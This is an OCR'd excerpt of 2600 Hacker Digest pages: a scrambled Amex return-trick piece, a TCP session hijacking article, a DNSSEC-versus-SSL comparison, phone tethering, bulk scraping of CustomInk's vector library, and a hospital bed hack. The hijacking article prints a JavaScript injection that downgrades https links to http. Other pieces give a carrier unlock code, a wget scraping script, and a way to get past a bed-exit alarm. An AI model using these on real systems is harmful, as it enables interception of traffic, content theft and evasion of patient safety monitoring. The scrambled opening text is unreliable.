Just like any red-blooded American. if you check the outstanding balance for your current bill. Don’t forget your credit card. take note of how short you are and mosey on over to your local mall.2600. you will see that it has decreased by the amount of the return as Amex applies the credit to your account immediately. You will have to repay it in full the next month.THE HACKER DIGEST . as they give me tons of frequent flyer miles and come with an almost three week grace period each month to pay my bill. my wallet is bursting with credit cards from various banks that are more than happy to give me huge amounts of purchasing power in exchange for exorbitant APRs. but you have successfully received a free loan from American Express and avoided accruing any interest fees! Keep that credit crisis rolling! Shout-outs: Galaxy and The Coot
Step 3: Return it
Step 4: Wait for the credit to post
As soon as your account closes for the month at hand. If not. that this trick will not give you a free pass on the return money. to help keep your account in good standing and avoid accruing interest charges.com
151
. My personal favorites are my American Express cards. Make sure that you have the cashier credit your card.

secure from being spoofed from random attackers) in so much as it uses a random sequence number. this number is by no means random or unknown.. Think back. right? We’ll never see their like again. and anything you did could affect all other users on the network. Free. a cheesy flashback ripple effect.THE HACKER DIGEST . GI Joe being just a cartoon. or complain about old people always talking about “the good old days” if you can’t (and while you’re at it. Without this sequence number. dozens of helper javascript) files when they load. TCP is only “secure” (that is. Sharing the same network. or which is included by a page. we just need to tweak them around a bit. Instead of virtual circuits between the systems communicating. unencrypted wi-fi. is allowed to alter the page. timing might reveal that the packets are coming from a closer source than a physically distant remote host. get off my damn lawn with your rap music and your skateboards). packets which claim to be part of a connection are discarded. I’ll just take my laptop and go sulk at the coffee shop and leech a little free wi-fi.. Most likely the best trick that most of us have forgotten all about is TCP session hijacking. Too bad the good (which is to say. but for all practical purposes a client application will have no chance of detecting a spoof attack.. That’s right. Back to the days of big hair. and that the packets came from a host which knows the proper sequence. Where all the users are on the same channel. Exploiting this allows matching things like HTTP requests and replacing them. Shared media networks . extract the sequence number. ripped jeans. Imagine. but they can also be hijacked in the middle of a stream by beating the next legitimate packet. Cookies are based on domain controls so that only websites which appear to be the proper domain can access them. this is by no means limited to simply pranking.were a hacker’s playground. and reply quicker than the foreign system. that the packets are delivered in order. protected. The sequence number is used to ensure that all packets are delivered. and shared media networks. The HTTP security model is generally based around the idea that only javascript code which is part of a page. synthesizers.the predecessors of modern switched networks . A local attacker is closer. Performing a TCP hijack is the same as it’s ever been: Capture packets. Sessions can be hijacked at the beginning of the connection by spoofing the remote system during the handshake process. bad) old days are long gone. each hop taking more time to navigate... Most modern AJAX-ified Web Two Point Whatever pages include helper javascript (and often. every system on the network got the packets from every other system. Every TCP connection goes through a handshake stage where the client and server exchange sequence numbers and establish the connection. All the old tricks work. Anything anyone else on your segment did was visible. and then promptly forgotten as anything other than a method to make people look at goatse. and packets sent from then on advance the sequence number by the number of bytes sent. Arguably.VOLUME 26
Transmissions
by Dragorn
Lean back and remember the 1980s (if you can). By delaying the TCP session
152
. The obvious risk from this (and one many attendees of DefCon learned to their dismay) is replacement of any web content with any other arbitrary content. wi-fi is a time machine to the 80s. and therefore able to respond more quickly than a remote host which can be thousands of miles and many routers away. Everything now is switched. On a shared network like open wi-fi. When a TCP session is spoofed. encrypted.. Any one of those javascript helper files has privileges to control the content of the website. exactly this attack was shown about five years ago at DefCon in Airpwn by Toast. In fact... it is indistinguishable from traffic coming from the legitimate host. Browsers such as Chrome segregate individual pages into separate instances to prevent cross-contamination. Unfortunately. All of these protections are eliminated when surfing an unencrypted website on an open network. On a shared physical medium.

opening a variety of possibilities. purely browser-level issues such as wrapping all future browsing in an iframe can still compromise sessions. Files loaded in the background are just as cacheable as normal web pages.setAttribute(“href”. The only way to avoid bringing home something unexpected from the coffee shop wi-fi is pretty much the same as the precautions you should be taking already. with one notable addition: Use a VPN or SSH tunnel for all traffic. Detailed by Robert Hansen at http://www. Articles must not have already appeared in another publication or on the Internet. 153
. ➥rval. For example. someone has fed you a poisoned javascript file. and loading additional attacks becomes a trivial. or at the office. ➥getElementsByTagName(‘a’). } refs[i]. you don’t mind someone having one of your logins somewhere). can be set to cache. poisoning links. NY 11953-0099 USA. replacing every https link with the unencrypted http equivalent:
var refs = document. If you go the snail mail route. Even websites which normally are not considered trusted. ➥i++) { var rval = refs[i]. }
Once inside the DOM.
WRITERS WANTED
Send your article to articles@2600.VOLUME 26
hijack until the handshake is completed and the user has requested a file. PO Box 99. Even without exploiting the browser. or aren’t something you care about (if. but once inside the DOM it becomes trivial to rewrite the content of pages on the fly. may now lurk. The chances of picking up something unpleasant from public networks is compounded when you consider the risks of the browser cache. returned as part of the TCP stream. please try to include a CD copy so we don’t have to retype the whole thing if we decide to use it. it becomes easy to target specific files (for example. ➥getAttribute(“href”). slowly. What can happen to you? Just about anything. which we just saw being altered for fun and profit. Javascript helper files. Having your browser fed a selection of the latest exploits is one obvious result. for (var i = 0.replace(/^https:/. i < refs. The HTTP headers are. The addition? Use it for all traffic. The cache is controlled by the HTTP headers. or the page using it changes to include another file. acting completely normally. you may do whatever you please with your article. of course. Once cached. So. Even “low-trust” web pages remaining in your cache indefinitely until the next browser 0-day hits and they include a new attack via a cached callback. but major. Simply clearing the cache or setting the browser to not cache may prevent retaining poisoned content. if (rval == null) { continue. until a new browser vulnerability allows a takeover of the whole system.THE HACKER DIGEST . controlling the cache of a page on an insecure
network can lead to control of secure content later. waiting for an opportunity later. a hostile file can call home each time it’s loaded. risk. for some inexplicable reason.. Once in your cache. graphics can be attached) or mail it to us at 2600 Editorial Dept. Once published in 2600. a hostile file will remain until the browser cache is cleared. “http:”). Think about that one again. because they don’t require a login.com (ASCII text preferred. no content can be considered safe. the cache expires. a tracking/ statistics file from a popular company which rhymes with “moogle”).com/ ➥rfc1918-security-issues. but that won’t prevent local attacks from working in the first place. This might be when you’re at home. and avoiding them is very difficult.length. These risks are inherent in any open network. The spiked file may do nothing for a month. redirecting forms. When the TCP stream can no longer be trusted.sectheory. extracting cookies. Middle Island.htm.

As we no longer can trust that the certificate issuers are doing their jobs correctly. You have some serious reading to do if you don’t know who that is. We must therefore analyze the process of how the public key gets signed and how the certificate is obtained to be able to score this round. you normally specify the higher authorities with trust-anchors in your resolving DNS. however. The experiment undermined the trust of SSL certificates in general. Each top level domain (such as . we can no longer trust SSL certificates in general. there is no central policy on how the authentication must
Round 1: Trust
154
.gov top level domain. Dan Kaminsky . As both technologies solve the same problem. instead trust is established by special DNS records that are published and signed by the top level domain. DNSSEC and SSL overlap. The US Federal government announced that they would sign the . So far.com
DNSSEC is a promising technology that will increase trust on the Internet. In DNSSEC. .gov to sign 2 their domains . In DNSSEC.UK) needs to have an authentication process in place to make sure that only valid requests get signed and published. TLS. both technologies provide additional security benefits that are not covered in this article. The technologies will never be mutually exclusive.
DNSSEC allows for authenticated denial of existence (very useful?). The Office of Management and Budget (OMB) issued a memorandum requiring agencies under . one can question if we need to use them both? • Can I turn SSL off if I’m using DNSSEC? • Do I really have to implement DNSSEC if I already have SSL? This article is a seven-round match up between the two technologies. DNSSEC enables you to identify sites on the Internet so that you really know that you are communicating with the correct one. How is trust implemented in each technology? Both technologies provides endpoint authentication of the server you are communicating with. For example. 2. managed to get an SSL certificate for a domain 3 that he wasn’t affiliated with .THE HACKER DIGEST . Some people think that DNSSEC will save the world and that everything will be safe after implementing DNSSEC. The technology came into the spotlight during 2008 because of two events: 1 1. is the same. the certificate issuer is supposed to check the identity of the requester before a certificate is issued. DNSSEC will face the same control and regulation challenges as SSL certificates do. a security researcher. In SSL this higher authority is the issuer of the certificate. It is very likely that DNS software will come preconfigured with trust anchors in the future. I will analyze which integrity mechanisms the technologies can provide.MIL. I think that DNSSEC is a nice addition that complements existing technologies. Recently. Not that much of a difference between the technologies there. how they are implemented. the parent domain (typically the top level domain) should check the identity of the child before the records are signed and published. Just to be clear. DNSSEC stands for Domain Name System Security Extension and adds security to domain name lookups. Both DNSSEC and SSL are designed with integrity as a goal. That is. The issuer did not authenticate the requester correctly. Some even think that it will stop phishing attacks. .ORG. . much like browsers come preconfigured with a list of certificate authorities to trust. works by installing a digital certificate on the web server. Both technologies have higher authorities that vouch for an identity. either. We have all seen HTTPS in action and most readers probably have a general knowledge of how it works. SSL can encrypt data to guarantee confidentiality. His little experiment exposed a weakness in the SSL certificate issuing process.SE.VOLUME 26
by John Bayne stephan@scandinode. Some think that it will prevent spam and guarantee that senders aren’t forged. Eddy Nidd. how certain we are that the site we are visiting actually is the one it claims to be. and how they differ. The end result. allowing users to connect via secure HTTPS instead of HTTP. In SSL. Those higher authorities are listed in your browser. Security is never stronger than its weakest link. In DNSSEC there is no certificate sent back to the requester. The authentication stems from the fact that there is a chain of trust that you can follow to verify the identity. that more popularly is being referred to as SSL. For one particular problem.

the challenges are even worse in DNSSEC as most top level domains use third party registration partners to do the actual authentication of the requester. even if you have access to a computer or router in its path. The visual warning is determined by how it is implemented in the browser. owned by Verisign. doing online banking. SSL has some obvious flaws when it comes to authenticating the requester of the certificate. DNSSEC only secures the DNS lookup. But 6 Not Threatening” . DNSSEC suffers from the same dilemma. How strong are the algorithms that are in use? In the beginning of 2009. Somebody with access to a computer in the path between the sender and receiver can potentially tamper with communication. one certificate out of seven is using this old and 5 deprecated MD5 security algorithm . they are still not up to the challenge. and therefore the trust in DNSSEC can be questioned. There are thousands of third party registration partners that have to authenticate the requester in a secure way. To make an analogy. Although the warnings have become better and clearer with the newer versions of browsers. The next version of Windows will only ship with a “non-validating. (If you ever feel that you would like to stop trusting a particular CA. We need to wait for full DNSSEC support from the client operating system before we can have a true end to end security. What he forgot to explain is that there might be one or more fake Certificate Authorities out there that can issue valid certificates for any server. There is no central body that oversees and audits the certificate authorities. Therefore. you can do so by going to Tools/Options/Advanced/ View certificates/Delete in Firefox) The MD5 algorithm is deprecated in DNSSEC. and there is no way of knowing that the DNS community would do a better job. The true end to end capabilities of SSL makes it a winner in this round. This round is a draw. DNSSEC is not end to end. Does the technology provide true end to end security? SSL provides near end to end security. There are about the same number of certificate issuers in a browser as there are top level domains. Alexander Sotirov found an issue with SSL allowing him to create a rogue Certification Authority (CA) certifi4 cate trusted by all common web browsers . The lack of end to end security makes DNSSEC vulnerable for attacks in the last hop between the resolving DNS server and the client.
Round 3: End to end
Round 2: Algorithms
Round 4: User Warnings
155
.THE HACKER DIGEST . The only way to interfere with SSL would be at the end nodes. DNSSEC is the winner in this round. Instead. In fact. The RFC recommends that IPSEC be used as a mechanism to prevent this. Tim Callan of Verisign quickly wrote an article in Securityfocus claiming that “MD5 Hack Interesting. How do we make sure that every top level domain and every registrar implements the controls correctly? We can’t. Some top level domains (yes. The Certificate Authority in question was RapidSSL. the resolving DNS server at the client side validates the records and notifies the client about the outcome. Most users don’t check to make sure that they are on a secure site when they are. for example. The warnings usually consist of a small padlock icon. or a green background in the address field. It is therefore impossible to tamper with the communication. security-aware stub resolver. The SSL community should have ditched MD5 a long time ago. you are securing the phone book lookup but not the actual call. as the traffic is secured between the browser and the web server. both technologies lack control mechanisms for how trust is implemented.VOLUME 26
be performed and there are no control mechanisms in place to control the top level domains. This certificate allows us to impersonate any website on the Internet. and not the communication. It is typically only secure between the resolving DNS server and the authoritative DNS server and not all the way up to the client. you guessed it) use SSL to secure communication when users are being authenticated. He took advantage of the weak MD5 security algorithm that is in widespread use in SSL certificates.” These types of resolvers are not true 7 end to end . SSL is implemented on top of the communication protocol it is securing. That would. On the other hand. however. How clear is the warning that the technology present to the user about invalid certificates/ resource records? SSL is often criticized for the visual warnings (or lack thereof) that are presented to the user. so implementing controls will face the same type of challenges in both technologies. An attacker could potentially tamper with the packets between the resolving DNS and the client to trick the client into thinking that the digital signature of the requested resource record is valid. be hard to implement and maintain in a real world environment. In fact. It is yet to be seen how DNSSEC will handle this.

SSL is the clear winner in this round. Furthermore. expired or issued to another host). for the vast majority. HTTPS. DNSSEC doesn’t really protect communication. Perhaps less known is that this can be blocked at the network layer in a proxy or similar device. This makes DNSSEC a winner in this round. it is next to impossible to implement DNSSEC even if they wanted to. FTPS. so there is not that much we can do about it. LDAP vs. Usually only external facing web servers gets the privilege of having a real SSL certificate. Some proxy servers can be set up in such way that a centralized certificate policy is enforced. The resolving DNS server is typically where you configure the trust anchors and where the validations of signatures occur. DNSSEC has a chance to catch up in this category if they implement a better warning system. and one is a draw. Even with the identified problems with SSL. SSL can be configured with a central policy. but it will take several years before DNSSEC will be adopted in such scale that it will be usable for any real life scenarios. The scope of SSL is normally limited to one application on one server. just a few top level domains support DNSSEC so. As no zones were signed. Can I turn SSL off if I’m using DNSSEC? No. In DNSSEC. The egg is about to crack with initiatives such as the OMB mandate. just DNS lookups. There is really no good way to implement a centralized configuration in DNSSEC. it didn’t make sense to implement DNSSEC on the client side and. even when the signature doesn’t validate. SSL is here to stay. it didn’t make sense for domain owners to sign their domains. Signing additional resource records can be done with little extra effort. LDAPS). as clients never checked the signatures. SSL wins this round.
Round 5: Centralized configuration
Round 7: Scope
Summary
Round 6: Adoption
Back to the questions
156
. How broadly will the technology protect you? A security technology should have a broad scope. DNSSEC has the possibility to catch up. This will force the resolving DNS server to respond. DNSSEC can’t. There is extensive support for SSL in both browsers and servers. as the associated bogus records will not be sent back. DNSSEC is implemented on a per zone basis. The client will be prevented from continuing if the validation fails.VOLUME 26
DNSSEC faces the same issues with user warnings and has yet to prove if it is up to the challenge. SSL wins four rounds. it still wins this round. As DNSSEC gets implemented on a broader scale. How widespread is the technology? SSL has been around for many years and is a technology that is much more widespread in use than DNSSEC. DNSSSEC has a lot of catching up to do. DNSSEC is a promising technology.THE HACKER DIGEST . instead of relying on users. Time has proven that SSL is a usable and reliable technology. HTTP vs. The technology has suffered from the chicken and the egg dilemma. Although it is possible to purchase a wildcard SSL certificate that can be used on any server in your domain. a proxy server can be set up in such way that it disallows users to continue if the certificate is invalid. and DNSSEC is not truly end to end. it is more common to purchase individual certificates per server. DNSSEC can only add security in the rare cases when you know that both endpoints support the technology. such as for internal communication or communication with a partner. you have a resolving DNS server between the client and the site that you are communicating with. we will see if the technology is up to the challenge. this behavior can be circumvented by the client by setting the checking disabled (CD) 9 bit in the query . and the few implementations that are out there don’t look very different from what SSL is 8 providing . Both DNSSEC and SSL aim at solving the integrity problem and both are doing a pretty good job. to be able to provide protection for many different servers and applications. This behavior is a requirement in the RFC. Each application needs to be secured individually and there is typically a secured counterpart to each insecure application (FTP vs. even if encryption is solved by some other means. is obviously a huge advantage on any network. However. DNSSEC wins two. For example. There is very little client side support in operating systems and browsers for DNSSEC. Right now. but is much less mature. I would strongly advise against turning off SSL just because you implemented DNSSEC. Most people argue that one of the biggest challenges for SSL is the fact that the user can override and continue to a site even if a certificate is invalid (for example. How easy is it to implement a centralized policy for the technology? To be able to centrally configure a policy on what is allowed. DNSSEC has a shorter history and is not widely adopted.

voicemail. US cert advisory. ➥n l n e t l a b s . you can enable or disable USB mass storage. plugging in the phone will put it into USB mass storage mode. No accompanying software is supplied. use USB storage or Bluetooth object exchange.us-cert.2.5mm plug. BREW software environment.com/columnists/488 7) DNSSEC in Windows 7. External sockets are provided for a mono or stereo headset with 2. though the phone will charge. ➥securityfocus. 1) Dan Kaminsky. DNSSEC has a broad scope and it is easy to add security all your servers and applications with little extra effort. The display will flip to landscape when you turn the phone. and wireless web access are available on higher plan levels. No driver is required for charging.
Introduction
The Samsung SCH-R450
The R450 has a 1xRTT connection. http:// ➥b l o g s . http:// ➥n e w s . The USB cable is provided in the box.2 http://www. picture messaging. ➥php?rfc=4035
References
Te t h e r i n g t h e S a m s u n g SCH-R450 on MetroPCS
by VXO
MetroPCS is a flat-rate CDMA wireless carrier with service in some larger metropolitan areas throughout the United States.gov/omb/memoranda/ ➥fy2008/m08-23.html 2) OMB DNSSEC mandate. http://www.rfc-archive. c o m / s s e s h a d / ➥ archive/2008/10/30/dnssec-in➥windows-7. n l / p r o j e c t s / d r i l l / ➥drill_extension. t e c h n e t .html 9) RFC 4035. In the menu under Settings / Phone Settings / PC Connection.THE HACKER DIGEST .whitehouse. BREW applications available for the phone include Metro411 (a V-Enable Mobile411 directory assistance app). you would probably want to add DNSSEC. It doesn’t appear to support the proper AT commands to kick it into BREW mode. http://www. The phone will charge on any powered USB 1 or 2 port. and a port for a USB data cable.aspx 8) Drill extension to Firefox. the R450 Messager was MetroPCS’s only offering with a full keyboard. The plans range from $30 to $50 per month. exposing the full QWERTY keyboard below. charger. To get files on and off of the phone.html 6) Tim Callan Securityfocus.pdf 3) Eddy Nidd SSL certificate hijack. the CD bit. there is not much to be gained by implementing DNSSEC. Various MetroPCS phones are plentiful on eBay and other sources. and a Mobile IM client. Section 3. unmount the volume and press the soft key for “Done” to go back to normal operation. To sum it up: Both DNSSEC and SSL are needed. http:// ➥www. If you have USB storage enabled.gov/cas/techalerts/ ➥TA08-190B.org/getrfc. and uses customer-owned handsets. BitPIM does not recognize the phone yet. The BREW implementation on the older Kyocera Strobe would operate on the external or internal LCDs. or are available seperately. Before the Blackberry Curve was offered. Nothing else functions while it’s in USB storage mode.VOLUME 26
Do I really have to implement DNSSEC if I already have SSL? If you are only looking to secure one server and one application and you already have SSL. SSL is designed to provide the required protection by itself. The service plans include unlimited use of local and long distance voice services. GPS.org/research/ ➥rogue-ca/ 5) Use of MD5 in SSL. n e t c r a f t . Bluetooth audio and object exchange profiles. Of course. Strangely. Loopt. 1280x960 pixel camera. http:// ➥www. music player.startcom. http://www. the best thing is always to implement both technologies.
157
. The top of the phone slides sideways.phreedom. and builtin Openwave web browser. MicroSD socket. or other compatible accessories. The phones available on MetroPCS currently range from the more basic “candybar” handset at $80 to a Blackberry Curve at $450. and won’t talk to it as “Generic CDMA phone” or anything. When you’re done. But if you are looking at security from a broader perspective. Mail@Metro (an e-mail client). c o m / a r c h i v e s / ➥ 2009/01/01/14_of_ssl_certificates_ ➥signed_using_vulnerable_md5_algo ➥rithm. Text messaging.org/?p=145 4) Alexander Sotirov rough CA. the BREW environment and browser only operate with the slide open. MetroPCS service requires no contract. https://blog.

4 it comes up as something different. MetroPCS blocks anything on ports other than 443. including DUN mode. Shouts out to: Robert. you get a 404 thrown off from Apache Coccoon. if you have the wireless web feature enabled on your account. Windows users can also do this with a driver included in Samsung PC Studio. hit 2 and enjoy the wonderful little beat it plays. You can enter this in the Proxies tab under the network configuration. 3055551234@mymetropcs. usbmodem***. I haven’t been able to get other applications to connect through it properly if entered as a SOCKS proxy. and 64 kbit/ sec up. The telephone number is #777. you should be able to make the system dial it. On 10. For best results on the MetroPCS network. keep your phone’s PRL up to date.9. Entering it as a web http proxy works. +MS. Dial *228. OK you’re going to need to go through a proxy.net through the Metro proxy showed 112 kbit/sec down. com port 3128.com. so you’re going to need the cable. you can hook the phone up to your computer and use it as a wireless data connection. who pioneered wireless transmission and telegraphy so many years ago. A test run at speedtest.* range. Set the account name to your phone number. then power cycle the phone. but it’s disabled out of the box. you get thrown back to that page with the next http request. Output buffers 16 If you use ZTerm or minicom to connect to the serial device. If you hit that page from a normal web browser.com. Choose it in the Show: dropdown box.5.4. with a ping response of 999 msec. ls /dev | grep -i modem should show it. This isn’t exactly EV-DO. on port 443. check out the Samsung R450 Hacker’s Manual. The wap. and “PRL Download OK!” appear on the bottom of the screen in a tiny font. you should be able to get the usual modem responses. If you want Web access on 80. AT should yield OK. selecting “Verizon Support (PC 5220)” seems to work well.VOLUME 26
This handset is not nerfed like the Razr! USB CDC ACM class modem support is present on the phone. who first introduced me to MetroPCS. “Samsung CDMA Technologies”. You’re in.
158
. Model: I: SCH-R450/99 Revision: I: Q6055BSKAXLZ31501 1 [Nov 15 2007 24:00:00] ESN: 0x[*FNORD*] +GCAP: +CIS707-A. On Mac OS X 10. anywhere. Now you can immediately connect to anything. You’ll see a number of otherwise hidden options. You should see “Programming in progress”. bringing us easy access to information today. +ES. +DS. The cable appears to just be a mechanical cable with no converters or anything. I’ve found that FreeNX runs well over the connection to a ssh server on port 443 to connect up with a remote X11 desktop. but it isn’t too bad either. The wap. and the device will be recognized once you hit Done on the phone. Scroll down to DUN mode and turn it on.com proxy also tends to be pretty slow. The output of dmesg should show something like this: AppleUSBCDCACMData: Version number 3.metropcs. Press OK to get into the menu. “SPC Unlocked OK!”.THE HACKER DIGEST . When it finishes. The phone will ask for a code. just for good luck and fortune.. and you’ll get a modem settings page. +FCLASS If USB storage mode is enabled. They provide a web proxy at wap. it will reboot. this will be /dev/ttyACM0. A box should pop up saying it found a new device. PC Studio won’t do anything with the phone itself. which is 587846. It doesn’t appear to need a username/password. and the password to mymetropcs. it will show up as /dev/tty. and ATI should yield a bunch of info: Manufacturer: I: SAMSUNG ELECTRONICS CO. Enjoy. but it’ll drop the proper driver on the system for the “Samsung CDMA Technologies” device to use it as a modem. It’s got a captive portal. Open System Preferences and go to Network. which is that same lovely semi-useless orange and blue “Downloads” page you get on the phone when you start the browser. Once this is enabled. so it may just be web only. and select Generic / Generic Dialup Device for the model. so you may want to find another proxy somewhere that listens on 443. After about a minute of inactivity. For more information on the hidden features of the SCH-R450.com proxy is a strange one. and it’ll almost immediately show an IP address in the 10. you will probably also see an initDevice failed message. Connect the USB cable and you should get a USB CDC ACM class modem device! On Linux. wait for it to ask you what you’re calling about.metropcs.metropcs. then 9 #.1. and happy hacking. Unfortunately. available on handsonforums. Nikola Tesla and Guglielmo Marconi. Go to the Modem tab. On 10. This is harmless. the phone software does not support Bluetooth dialup. If the phone likes the resulting init string and settings. Input buffers 8. LTD.

it was pulling gifs from */ clipart/gif/* So for example. ➥customink.VBS file on the desktop and inserted the code below: Set fs = CreateObject(“Scripting. you’re missing out on one of the coolest online shirt design companies of the past half decade. go to CustomInk. I ran the following command with a copy of the ALLEPS.THE HACKER DIGEST . If you want to see what I’m talking about. so I can simply generate a list of URLs without any effort at all! So now I needed to generate a bunch of sequential URLs..EPS to < 80000. quick guess was that the .. to “get” files from the web.com Vector Library
by GantMan
If you’ve never used CustomInk. For anything that’s not web related I load up Wireshark.customink. and even still browse the web in Firefox etc. without mucking up your packet captures.EPS.htm). called ALLEPS.Close msgbox “Dun” Running this . Building a sequential text file would be easy. one gif was from */clipart/gif/64772. since I was on a Windows machine at the time. ➥FileSystemObject”) Set a = fs.CreateTextFile(“ALLEPS. try twice at most.000 images you can add to your shirt. click the tab at the top that says “The Lab”.VOLUME 26
“Borrowing” the CustomInk. I went to sleep..
http://www. for the rest. but when you apply that math to number of clipart images CustomInk.com. If this is dynamically loading the .com.EPS files. please use their service so that they can pay their bills.gif* If you look at this path.com/clipart/ ➥eps/64772.. it’s hard not to be wowed by the cost of such a library. This allows you to have all your fun apps running. shouldn’t I be able to get some of those .net/packages/wget. But the file names are sequential.WriteLine(“http://www.EPS name. You may notice that they have over 10.EPS library. (Side note: I love Wireshark. and every-
This basically says.EPS file.EPS files for my own personal needs? Wouldn’t it be nice to have the entire 10. with a bunch of generated URLs that should download CustomInk’s .. I pulled up the library from CustomInk. I opened it to find the delicious vector representation of the GIF I was just ogling.EPS
thing came back perfect. So. the eps files went from 10000. it’s easy to notice it’s got a gif directory. so I began the adventure by loading up Fiddler (http://www.txt ➥ --tries=2 --retry-connrefused ➥ -nc --waitretry=1 -v
BOOYA! It gave me a download of a . but. because I suck at Wireshark filters. I awoke the following morning with the entire library :D This isn’t very nice to the CustomInk. Most of you know what to do with such a file.vbs file will put a file in the same directory. True) For xcount = 10000 TO 80000 a.EPS extention.EPS was in an /eps/ directory with the normal . A simple. As the system loaded the images. I chose to generate a quick VB script. do find and replace and pull down all those . “gimme all the URLs from the file. and they are scalable vector . ➥txt”.EPS files that are dynamically loaded..com has.EPS. Evil cogs start a-turnin’. I typed in a few more. I created a .” After running the command and seeing file after file get pulled happily into my folder. txt file in the same directory:
wget --input-file=ALLEPS. Once I installed wget on the Windoze computer I was using.EPS”) Next a. The web is filled with people selling “vector packs” of basically scalable clipart that you can buy.txt.com/clipart/eps/” & ➥ xcount & “.com/fiddler/) and watching the HTTP requests. and turn off just about every other application I have running. Using the above gif I generated the following guess and slammed it in the browser. just to be sure. one process I have is to go around and view all the GIFs and capture them all in Fiddler. press Ctrl + U to copy the URLs.
159
.com servers (about 10GB of vector files). you should download an application called “wget” for Windows (http://gnuwin32. Wget is an app that comes from our *NIX friends. and the gif already has the . :D ) Now that Fiddler was listening to IE.source ➥forge. From my browsing. so if you decide to design any shirts in the near future.EPS files into Flash for the shirt designer. and then click on the left side to add art. but Fiddler is just better because it only listens to Internet Explorer. ➥fiddlertool.000+ vector library for your own designs outside of the shirts? Or just for making a nice torrent for all your friends? I was on Windows. and give it a second between each failed attempt.

Made in Michigan. Every time he would try to get out of the bed. No big deal. I did get roomed with a guy during my stay. toward my new roommate. if you do. I went to get on it. they should let them keep the same bed if possible. The doctors would use this now and again during my stay. All the typical stuff. Since there is only the one power cable that connects the bed to the wall (that I could find). but more fun to watch was when the housekeepers had to remake the bed. All the data of the bed displays on a little plasma display. The beds were nice enough. if you want to attract the undivided attention of flies. I was being discharged. They moved all the ways one would expect. a bed motion locked indicator.VOLUME 26
Hacking Your Hospital Bed
by The Piano Guy
Having recently been a multi-day guest of a local hospital. I had to keep my leg up.htm) and didn’t find anything about how to connect the bed to the rest of the control circuits. you can get out of bed unnoticed. The hospital could have enforced that. I’m sure they could get them out of there quite fast. I moved the bed back. He was agitated and more than a bit senile. but if you’re ever in the bed and you can disarm the alarm. If you want to attract the undivided attention of a hacker. but I was happy to be compliant. and it started sliding across the floor at a rather rapid pace. This feature can also be leveraged to make sure that the patient doesn’t get out of bed without notifying staff. and was able to get onto the non-moving bed. and left alone in the room with the bed. and that made me wonder about the bed. it rolled very easily. prevented the bed from moving at all with one button. an alarm would go off and they would have to come in and try to secure him again. Heaven forbid there should be a fire and a patient isn’t ambulatory.stryker. and of course is available in pounds or kilograms. It was all I could do to stop the bed from pushing into his (through the curtain). I found out. and forgot to lock it. The bed doubles as a scale. They would bring it up chest high to make the bed. I wish I could do that with my bed at home . this is a company that my lawyer has bought stock in. I have to assume that there must be an X10 control. hope that your hospital has Stryker beds . locked it. as there were no motion sensors in the room. I was able to figure out that the weight can be charted and trended over time. The next button. get some dog poop. I noticed the sticker on the panel at the foot of the bed that said “for hospital staff use only. however. Before I lifted the panel. The day before I was discharged. and an indicator for “bed exit on. The first button was siderail control lights. and no locking mechanism or alarm went off. they had a control panel for turning on and off the room lights and an emergency call button. but it made more sense for me to move. I didn’t understand (at first) how that worked from a technical perspective. The next set of buttons allowed the hospital to set the angles from their part of the bed. I took a closer look and noted the light indicators on the panel. There was a power indicator. I went to their website (http://www. While I hope you have no need for a hospital stay.com/ ➥ en-us/products/PatientHandlin ➥gEMSandEvacuationEquipment/Beds/ ➥MedSurgBeds/SecureII/index. When they move a patient like this. but I digress. a warning light about the brake not being set. the TV worked. I was left to wait when it was time to check out. found the brake pedal on the side of the bed. As a scale.” Now. They wheeled my bed over. The next set of buttons locked out the individual siderail component movements.
160
. It was possible for the nurse to override whether or not the patient could turn on or off his or her own lights.no more bending over. The one mystery I didn’t learn about the beds in my time there was how they communicated with the light in the wall and the TV.” The bed was a Stryker Secure II. On the last day. they had to switch me to a different room (because of the agitated senile roommate). Please don’t hurt yourself. put a sticker on it that says “for staff use only. Bed Motion. Even though this bed weighed hundreds of pounds.” I opened the panel.unless you’re trying to get out undetected. from playing with the menus. I understand that it would have been more fair for him to be moved.THE HACKER DIGEST . At that point.

computers.THE HACKER DIGEST . this holds true today more than ever. A good number of us have jumped into the recent smart phone craze. a web browser. Big Brother has nothing on this level of surveillance. or sent out for repairs. all held up for display. And while we cannot deny the advantages of technology moving forward. all at your fingertips anytime. phone numbers.
161
. We’ve programmed ourselves into always being at someone else’s beck and call. it’s not all that different from previous generations who found themselves glued to televisions in search of a better reality.like even having a simple password for our phones . all the while becoming lost in our little devices at the expense of the actual world around us. Our entire worlds go into our phones and all of our contacts have corresponding files with as much detail as we care to store about them. an interface to all of the social networking sites. But we’ve been sacrificing our privacy for a while now. What’s of greater concern is how much of our lives are becoming dependent on technology in an unhealthy way. all sorts of games. We just are able to give up an increasing amount in a much more efficient way now. For far too many of us.. but their most recent post on a social networking site so you can gauge their mood or know what they’ve been up to before you even start talking to them. televisions. you name it. constantly text back and forth between others who are
doing the same thing. While that attitude isn’t exactly new (after all. we never need to be out of touch again. Clarke made the infamous observation that “any sufficiently advanced technology is indistinguishable from magic” nearly half a century ago. We don’t actually understand how our technology works nor do we particularly care to. Our phones. family minutiae. Addresses. We willingly give up our privacy and let the world know exactly where we are. Yes.all of this information becomes public when the phone is lost. Arthur C. The playing field has been completely changed. cars. We won’t even get into the many risks of compromise through the airwaves. They’re all doing very intelligent things and talking back and forth with us about their various tasks constantly. how many people really know how to build a telephone or a radio?). you can have not only a picture and name pop up when someone calls you. In the end. And since so many of us still don’t use adequate security . the ability to watch movies. far more than what the world has any right to know or has any sane interest in.VOLUME 26
Smart Regression
It seems that everything around us is becoming smarter. we feel that someone needs to take a good look at what is being left behind. lent to someone untrustworthy even for a moment. In fact. With increased coverage areas and all of us walking around with these things. It’s the ultimate nightmare. That isn’t really all that new. update the world via Twitter and Facebook as to our every step and mood swing.. Try finding a phone that doesn’t come with a camera. the consequences of surrendering virtually every aspect of our lives to “smart” technology could be extremely serious. etc. We read our email the moment it arrives. the very game itself is not the same. pictures. GPS features. You can have little essays written about everyone you know and every bit of information you have on them.

